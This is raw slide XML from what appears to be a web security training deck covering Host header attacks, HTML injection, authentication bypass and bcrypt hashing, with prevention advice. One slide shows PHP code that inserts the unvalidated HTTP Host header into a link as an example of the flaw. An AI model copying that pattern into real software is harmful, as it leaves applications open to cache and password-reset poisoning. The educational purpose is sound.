              <a:t>Updatable iterations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - As CPUs become faster so do brute force attacks. Since </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BCrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> stores the number of iterations as part of the hash it's possible to verify a password and then increase its strength by generating a new hash with a higher number of iterations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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383386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sh per seco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0"/>
            <a:ext cx="57531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202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meziantou.net/assets/pbkdf2.png?v=d74a06be&amp;utm_medium=social&amp;utm_source=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4865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00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Host Header Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The “HOST” header is part of the http protocol, vulnerable applications are vulnerable because they insert the value of this header into the application code without proper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>validation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>means not only applications hosted on Apache/Nginx can be vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For Host Header Attack Exploitation, basically there are two ways through which you can exploit the application i.e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>means of Web Cache Poisoning which manipulates caching systems into storing a page generated with a malicious host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is via Password Reset Emails when poisoned content is delivered directly to the target.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387152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According to RFC 2616: A client MUST include a Host header field in all HTTP/1.1 request messages. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the requested URI does not include an Internet host name for the service being requested, then the Host header field MUST be given with an empty value. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP/1.1 request without host header field must be responded by server with 400(bad request) status code.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why HTTP host header needed ?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2663345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There are several different types of attacks related to host header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unauthorized URL Redirect by Cache poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password Reset Poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access to internal hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross site scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why HTTP host header needed ?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1174351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There are several different types of attacks related to host header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unauthorized URL Redirect by Cache poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password Reset Poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access to internal hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross site scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why HTTP host header needed ?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3467310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da-DK" dirty="0"/>
              <a:t>&lt;a href="&lt;?=$_SERVER['HTTP_HOST']?&gt;/blog/"&gt;Blog&lt;/a&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Prevent Host Header Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1788849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The essence of this type of injection attack is injecting HTML code through the vulnerable parts of the website. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious user sends HTML code through any vulnerable field with a purpose to change the website’s design or any information, that is displayed to the user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the result, the user may see the data, that was sent by the malicious user. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Therefore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, in general, HTML Injection is just the injection of markup language code to the document of the page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data, that is being sent during this type of injection attack may be very different. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can be a few HTML tags, that will just display the sent information. Also, it can be the whole fake form or page. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>this attack occurs, the browser usually interprets malicious user data as legit and displays it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2315393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Firstly, different types may be sorted by the risks, that they bring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As mentioned, this injection attack can be performed with two different purposes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To change the displayed website’s appearance.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>steal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>another person’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>identity.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, the main types  are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflected HTML Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0"/>
              <a:t>Types of HTML Injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="0" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="191746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HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>validations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>escape all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>html tags and special </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>characters from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the user supplied input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reflective Cross Site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> The best way to prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cross-site scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is to make sure that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the web application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>does not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>make use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of user input in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>subsequent HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pages, without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>validating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sanitizing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>it .</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>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340878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Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>injection attack occurs when malicious HTML code is saved in the web server and is being executed every time when the user calls an appropriate functionality.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Stored HTML Injection:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3521475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This can be again divided into more types:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reflected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflected POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflected URL</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0"/>
              <a:t>Reflected HTML Injection:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="0" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2765174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ML Injection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5476875" cy="1123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0" y="838200"/>
            <a:ext cx="7772399" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>For Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a tester can check the source code for the login form and find what method is being used for it. Then appropriate HTML Injection method can be selected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>accor</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="871790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Reflected HTML Injection:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Reflected GET Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> occurs, when our input is being displayed (reflected) on the website. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Suppose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, we have a simple page with a search form, which is vulnerable to this attack. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if we would type any HTML code, it will appear on our website and at the same time, it will be injected into the HTML document.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4112187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There are no doubts, that the main reason for this attack is the developer's inattention and lack of knowledge. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>type of injection attack occurs when the input and output are not properly validated. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Therefore </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the main rule to prevent HTML attack is appropriate data validation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>How to Prevent HTML Injection?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="0" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2970010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Applications require authentication for gaining access to private information. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>every authentication method is able to provide adequate security.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>flaw in the application that allows users to access application resources without authentication is referred as’ Authentication Bypass’.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Authentication bypass vulnerability is generally caused when it is assumed that users will behave in a certain way and failing to foresee the consequences of users doing the unexpected.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0" smtClean="0"/>
              <a:t>Authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0"/>
              <a:t>Bypass</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1111720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There are several methods to bypass the authentication schema in use by a web application. Here are some of the common ways to bypass authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Direct page request (Forced Browsing)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Parameter Modification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Session ID Prediction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
